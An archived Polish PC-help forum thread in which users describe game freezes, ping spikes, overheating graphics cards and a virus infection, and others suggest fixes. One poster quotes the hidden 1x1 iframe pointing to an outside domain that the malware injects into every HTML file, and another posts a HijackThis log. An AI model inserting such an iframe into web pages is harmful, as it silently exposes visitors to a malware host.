Skocz do zawartości

Zarchiwizowany

Ten temat jest archiwizowany i nie można dodawać nowych odpowiedzi.

wies.niak

Problemy z kompem - zwieszki, restarty i inne cuda II

Polecane posty

Odpal program, w 1 okienku dajesz potwierdzenie (zielony znaczek). Następnie w okienku logic drive wybierasz logical drive, nastepnie potwierdzasz wybor zielonym znaczkiem, po chwili skanowania w okienku pojawi sie kosz o nazwie deleted. Tu znajdzisz pliki ;)

Link do komentarza
Udostępnij na innych stronach

Ludziska, mam problem z internetem. Mianowicie - pingi. Nagle, bez żadnego powodu, najmniejszy ping w jakiejkolwiek grze wynosi coś a'la 400. Tak - słownie czterysta. Nigdy tak nie miałem. Pingi zawsze wynosiły jakoś od 30 do 100. A tu nagle takie coś. Jeszcze rano grałem w CoD4 i wszystko było OK, teraz chciałem pograć znowu - patrze, a tu taka heca.

Co może być przyczyną? Macie jakieś pomysły? Bo ja kompletnie nie wiem co robić.

Link do komentarza
Udostępnij na innych stronach

Nie wiem gdzie napisać o tym, więc piszę tutaj.

Mam na dysku jakiegoś wirusa, który do WSZYSTKICH plików .html dorzuca linijkę:

<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>

Mój antywirus Avast (zaktualizowany do najnowszej wersji i ze ściągniętą najnowszą bazą wirusów) wykrywa go we wszystkich takich plikach. Przez cały czas szukam źródła, miejsca w którym znajduje się plik, który np. do pliku z tagiem <body> (.php; .html) który został ledwo wypakowany, od razu wrzuca podaną wyżej linijkę. Przeskanowałem cały dysk (wszystkie partycje) skanerem Avasta, użyłem programu CCleaner.

Przestały chodzić mi przeglądarki takie jak Chrome, IE, natomiast Kameleon chodzi normalnie (może będzie to przydatna informacja).

Skorzystałem z sytuacji, że mam dostęp do internetu na telefonie, więc wszedłem na tę stronę zief.pl, lecz pisze tylko "ooops" więc na nią nie wejdę.

Proszę o rady...

Link do komentarza
Udostępnij na innych stronach

Po instalacji GTA 4 jak gram to po chwili pokazuja mi sie male kwadraciki na ekranie i komputer sie caly zawiesza, myslalem ze to tylko blad w GTA ale ostatnio odpalilem np. mirror's edge i mam ten sam problem

Nie wiem co to moze byc a przez to nie moge grac bo srednio po 5min gry sie wylaczaja

Moj sprzet to:

Q6600

Sapphire 4870 512mb

2GB ram OCZ

Asus p5q

I najnowsze sterowniki mam 9.1

Od razu mowie ze nie mialem takich problemow poki nie zainstalowalem gta4

Link do komentarza
Udostępnij na innych stronach

@Aldaron127 spróbuj przeskanować kompa czymś lepszym niż Avast! (czyli czymkolwiek innym). Z tego co znalazłem na google wynika, że owy stwór odpowiedzialny za to nazywa się Win32/Virut, jeśli to rzeczywiście ten wirus, to na stronie masz narzędzie, które powinno sobie z nim poradzić.

[edit]

Logi z HJT też by się przydały.

Link do komentarza
Udostępnij na innych stronach

No i mam problem. :)

Nie tak dawno temu, bo w zeszłym tygodniu kupiłem nowy komputer, sam złożyłem. Wgrałem stery jakie polecał producent, nie koniecznie najnowsze. Przejdę do meritum:

- podczas grania w Wiedźmina gra potrafi się ściąć, muzyka leci i tylko kompa można wyłączyć - w sposób naturalny,

- podczas wczytywania Save w Prince of Persia gra się ścinia, muzyka też i "tylko kompa można wyłączyć - w sposób naturalny",

- w Dead Space, pare sekund po zaczęciu rozgrywki (można już bohaterem grać) gra się ścina i pomaga tylko restart,

- w Far Cry 2 jeszcze nie miałem żadnych problemów.

Tak więc, w czym jest mój problem? Czyżby karta grafiki do wymiany?

Jeszcze mi się przypomniało, macałem kompa w celu sprawdzenia czy się nie przegrzewa: RAM w sumie nie parzy, CPU trzymie się około 50'C w stresie przy FANie 2000RPM, a radiator grafiki parzy, może mieć z ~70'C.

Processor: Intel® Core2 Duo CPU E8400 @ 3.00GHz (2 CPUs)

Memory: OCZ Platinum 800MHz CL5 2x2GB

Hard Drive:Seagate Barracuda 320GB

Video Card: EVGA GeForce GTX 260 SSC 896MB (Driver - 181.22 WHQL, PhysX - 9.09.0121)

Motherboard: Gigabyte GA-EP45-DS3L

Computer Case: CoolerMaster Centurion 590

Supplier: Revoltec Be Quiet Straight Power 600W

OS: Windows XP SP3

Liczyłbym na pomoc z waszej strony.

Link do komentarza
Udostępnij na innych stronach

No z tą Kartą grafiki może być nie tak...spróbuj zdjąć obudowę (boczną sciankę) i wtedy w coś zagrać może z wentylacją coś jest nie tak...jeśli błędy się powtorzą...no to oddaj na gwarancje...(mam rozumieć że nic nie podkręcałeś tak?)

Link do komentarza
Udostępnij na innych stronach

Wiele to wałkowałem....męczyłem się na różne sposoby, i nic. Dokładnie mówiąc, w grach jak: FarCry 2, Burnout Paradise, BlackSite Area 51, GTA IV, demo FEAR 2...i w sumie długo by wymieniać. Po prostu w większości gier mam przeróżne małe przycinki. Nie są one spowodowane np. jakimś nieoczekiwanym wybuchem etc. , po prostu nawet stojąc w miejscu i patrząc sie na jakąś flagę rusza się płynnie -> zaciach sekundowy gry - i powtórka tego. Dokładnie opisując...najpierw płynnie, normalnie działa średnio 20-30 sekund, potem jest od sekundy po nawet 5 sek. ta przycinka [muzyka, dźwięki dalej grają], i koło się zamyka. We wszystkie wymienione gry gram na:

Athlon X2 4400+

2x1024 mb DDR2

PowerColor HD 3850 512mb

Windows Vista x64

A konfiguracje gier maksymalne , 1024x768 [prócz GTA IV, tam medium]. Czym to jest spowodowane ? Procesorem ? Zapchaniem już systemu ? Totalnie nie wiem...i proszę tylko nie wciskać mi że za słaby sprzęt, bo w takim razie dlaczego teoretycznie mam np. w Burnoucie 40-50 fps, a w FC2 20-40 ?

EDIT: Wyprzedzając następne pytanie, bo zapewne o temperatury będzie....

CPU - spoczynek: ok. 45 - w trakcie grania: 57

GPU - spoczynek: ok. 40 - w trakcie grania: 54

Link do komentarza
Udostępnij na innych stronach

Sevard, dołączam log z HiJackThis i błąd przy skanowaniu tym podanym przez Ciebie.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 08:26:00, on 2009-02-09
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v8.00 (8.00.6001.18372)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Windows\WindowsMobile\wmdc.exe
C:\Windows\RtHDVCpl.exe
D:\Programy\cFos Speed\cfosspeed.exe
C:\Windows\System32\oodtray.exe
C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
C:\Windows\System32\rundll32.exe
D:\Programy\Nowe Gadu-Gadu\gg.exe
D:\Programy\RivaTuner v2.08\RivaTuner.exe
C:\Windows\System32\mobsync.exe
C:\Program Files\AutoConnect\AutoConnect.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Windows\system32\mfpmp.exe
D:\Programy\Mozilla Firefox 3 Beta 2\firefox.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: Solid Converter PDF - {259F616C-A300-44F5-B04A-ED001A26C85C} - D:\Programy\SolidConverterPDF\SCPDF\ExploreExtPDF.dll
O2 - BHO: flashget urlcatch - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - D:\Programy\FlashGet\jccatch.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O3 - Toolbar: Solid Converter PDF - {259F616C-A300-44F5-B04A-ED001A26C85C} - D:\Programy\SolidConverterPDF\SCPDF\ExploreExtPDF.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [Windows Mobile Device Center] %windir%\WindowsMobile\wmdc.exe
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [cFosSpeed] D:\Programy\cFos Speed\cFosSpeed.exe
O4 - HKLM\..\Run: [OODefragTray] C:\Windows\system32\oodtray.exe
O4 - HKLM\..\Run: [ISUSPM] "C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -scheduler
O4 - HKLM\..\Run: [RivaTunerStartupDaemon] "D:\Programy\RivaTuner v2.08\RivaTunerWrapper.exe" /S
O4 - HKLM\..\Run: [RivaTuner] "D:\Programy\RivaTuner v2.08\RivaTunerWrapper.exe" /T
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKCU\..\Run: [Nowe Gadu-Gadu] "D:\Programy\Nowe Gadu-Gadu\gg.exe"
O4 - HKCU\..\Run: [TaskbarResize] "C:\Users\Ochyra\Desktop\Skróty\Taskbar Resize.exe"  -Hide
O4 - HKCU\..\Run: [AutoConnect] C:\Program Files\AutoConnect\AutoConnect.exe
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\daemon.exe" -autorun
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [ISUSPM] "C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -scheduler
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'USŁUGA LOKALNA')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'USŁUGA LOKALNA')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'USŁUGA SIECIOWA')
O8 - Extra context menu item: &Ściągnij przy pomocy FlashGet'a - D:\Programy\FlashGet\jc_link.htm
O8 - Extra context menu item: &Ściągnij wszystko przy pomocy FlashGet'a - D:\Programy\FlashGet\jc_all.htm
O8 - Extra context menu item: E&ksportuj do programu Microsoft Excel - res://D:\Programy\MICROS~1\Office12\EXCEL.EXE/3000
O9 - Extra button: @C:\Windows\WindowsMobile\INetRepl.dll,-222 - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Windows\WindowsMobile\INetRepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Windows\WindowsMobile\INetRepl.dll
O9 - Extra 'Tools' menuitem: @C:\Windows\WindowsMobile\INetRepl.dll,-223 - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Windows\WindowsMobile\INetRepl.dll
O9 - Extra button: Badanie - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\Programy\MICROS~1\FRONTP~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\Windows\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\Windows\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: (no name) - SolidConverterPDF - (no file) (HKCU)
O13 - Gopher Prefix:
O15 - Trusted Zone: http://asia.msi.com.tw
O15 - Trusted Zone: http://global.msi.com.tw
O15 - Trusted Zone: http://www.msi.com.tw
O16 - DPF: {1E54D648-B804-468d-BC78-4AFFED8E262E} (System Requirements Lab) - http://dev.srtest.com/srl_bin/sysreqlab3.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - http://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1208192060799
O16 - DPF: {8167C273-DF59-4416-B647-C8BB2C7EE83E} (WebSDev Control) - http://liveupdate.msi.com.tw/autobios/LOnline/install.cab
O16 - DPF: {D1E7CBDA-E60E-4970-A01C-37301EF7BF98} (Futuremark Measurement Services Client) - http://www.yougamers.com/systeminfo/MSC3.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{1F473402-C9BE-4136-856E-F9CBD20FB561}: NameServer = 83.238.255.76 213.241.79.37
O20 - AppInit_DLLs: ?6
O22 - SharedTaskScheduler: Windows DreamScene - {E31004D1-A431-41B8-826F-E902F9D95C81} - C:\Windows\System32\DreamScene.dll
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Unknown owner - C:\Program Files\Bonjour\mDNSResponder.exe (file missing)
O23 - Service: cFosSpeed System Service (cFosSpeedS) - cFos Software GmbH - D:\Programy\cFos Speed\spd.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: Google Update Service (gupdate1c986e1b120130) (gupdate1c986e1b120130) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Performance Service (nTuneService) - NVIDIA - C:\Program Files\NVIDIA Corporation\nTune\nTuneService.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\Windows\system32\nvvsvc.exe
O23 - Service: O&O Defrag - O&O Software GmbH - C:\Windows\system32\oodag.exe
O23 - Service: SolidPDFConverterReadSpool (ScReadSpool) - VoyagerSoft, LLC - D:\Programy\SolidConverterPDF\SCPDF\SolidPdfService.exe
O23 - Service: Update Center Service (UpdateCenterService) - NVIDIA - C:\Program Files\NVIDIA Corporation\System Update\UpdateCenterService.exe

--
End of file - 7966 bytes

post-58916-1234164915_thumb.jpg

Link do komentarza
Udostępnij na innych stronach

radiator grafiki parzy, może mieć z ~70'C.

Troche dużo - jak radiator ma tyle to sama kość więcej. Najpierw do tego bym zaczął szukać przyczyny.

Jeśli możliwe najbezpieczniej będzie zareklamować kartę - jeśli to niewygodne można zdjąć radiator i przesmorować pastami gdzie trzeba. Jak się to zrobi umiejetnie to śladu nie będzie.

Link do komentarza
Udostępnij na innych stronach

Troche dużo - jak radiator ma tyle to sama kość więcej. Najpierw do tego bym zaczął szukać przyczyny.

Jeśli możliwe najbezpieczniej będzie zareklamować kartę - jeśli to niewygodne można zdjąć radiator i przesmorować pastami gdzie trzeba. Jak się to zrobi umiejetnie to śladu nie będzie.

Karta mocno zabudowana, śrubki od obudowy karty zaplombowane.

Edit:

Ale lama ze mnie, do karty jest dołączony swego rodzaje program w którym mogę zmienić pare parametrów karty.. w tym szybkość GPU_FAN :) Jak dam na full to ledwo GPU się grzeje do 45C.. chłodniutko.

Link do komentarza
Udostępnij na innych stronach

Hmm...nie wiedziałem za bardzo gdzie to napisać, ale dobra. Otóż, gdy gram w np. Assassin's Creed, Prince of Persia to PC łapie zwiechy na chwile...coś jak w Gothicu3 się często zdarza. Yyym...nie zależnie pod poziomu detali - chodzi tak samo. A miesiąc temu Assassin mi chodził bez żadnej zwieszki. ;/ Kompa mam : AMD Athlon 64 X2 5200+ o/c z 2.7 na 3.0, grafike GeForce 9600 GT, 2 GB RAM'u...

Link do komentarza
Udostępnij na innych stronach

1. Mam problem z moim laptopem gdy np. rozmawiam przez skype lub po prostu siedzę w przeglądarce ekran co jakiś czas robi się czarny ale przedtem wyskakuje błąd i coś tam coś tam bluescreen.

Wie ktoś o co chodzi???

2. I drugie pytanie czy da się jakoś naprawić płytkę EA która restartuje mi kompa po włożeniu do napędu lub próbie wyjęcia???

Do poniższego nie działa próbowałem na kilka sposobów i nie działa

Link do komentarza
Udostępnij na innych stronach

@Jetson w takim razie spróbuj zainstalować najnowsze sterowniki i DirectX. Dzieje się tak we wszystkich grach, czy tylko niektórych? Możesz także przejrzeć dzienniki systemowe w poszukiwaniu błędów aplikacji.

Link do komentarza
Udostępnij na innych stronach

Czytałem na necie że problem z twoją kartą często występuje właśnie w GTA IV . Problem może leżeć po stronie BIOSU. Proponuje aktualizacj. Tak przeczytałem w necie i tam też proponowali upgrate BIOSU.

Link do komentarza
Udostępnij na innych stronach

Gość
Temat jest zablokowany i nie można w nim pisać.


  • Kto przegląda   0 użytkowników

    • Brak zalogowanych użytkowników przeglądających tę stronę.

×
×
  • Utwórz nowe...